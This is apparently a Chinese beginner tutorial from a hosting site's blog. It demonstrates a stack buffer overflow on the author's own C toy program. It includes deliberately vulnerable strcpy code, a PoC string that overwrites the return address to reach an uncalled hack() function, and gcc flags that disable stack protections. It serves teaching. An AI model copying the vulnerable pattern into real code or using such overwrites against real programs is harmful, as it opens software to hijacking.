溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

簡單棧溢出利用

發(fā)布時間:2020-07-16 18:56:16 來源:網(wǎng)絡(luò) 閱讀:1755 作者:ToAlice 欄目:安全技術(shù) 
#include<stdlib.h>
#include<string.h>
void fun(char *name){
    char buf[10];
    strcpy(buf,name);
    printf("%s\n",buf);
}
void hack(){
    printf("flag\n");
}
int main(){
    char name[]="Alex@bbb";
    fun(name);
    return 0;
}

上面的程序是一個正常的C語言程序,但是main函數(shù)中沒有調(diào)用hack()函數(shù),下面我就演示下如何利用緩沖區(qū)溢出來執(zhí)行hack函數(shù)的內(nèi)容。


使用codeblocks編譯并執(zhí)行上述程序后,拖入od查看棧的變化情況,看看給變量name賦什么值的時候,會恰好覆蓋掉call fun處的函數(shù)返回地址

簡單棧溢出利用




F7跟進  F8 一句一句執(zhí)行:


簡單棧溢出利用




簡單棧溢出利用



因此我們添加poc:

#include<stdlib.h>
#include<string.h>
void fun(char *name){
    char buf[10];
    strcpy(buf,name);
    printf("%s\n",buf);
}
void hack(){
    printf("flag\n");
}
int main(){
    char name[]="Alex@bbbaaaaaaaaaaaaaa\x59\x13\x40\00"; //這里后邊四個為hack()函數(shù)地址
    fun(name);
    return 0;
}


重新編譯執(zhí)行后,我們發(fā)現(xiàn)利用成功:

 簡單棧溢出利用




在使用ubuntu復(fù)現(xiàn)棧溢出的時候需要關(guān)閉棧保護機制:

    使用gcc編譯時全部關(guān)閉保護機制,參數(shù)-fno-stack-protector用來關(guān)閉gcc編譯器gs驗證碼機制,

    -z execstack用來關(guān)閉ld鏈接器堆棧段不可執(zhí)行機制。





這里有一個linux下64位的棧溢出過程。

https://www.secpulse.com/archives/32328.html 






向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關(guān)證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI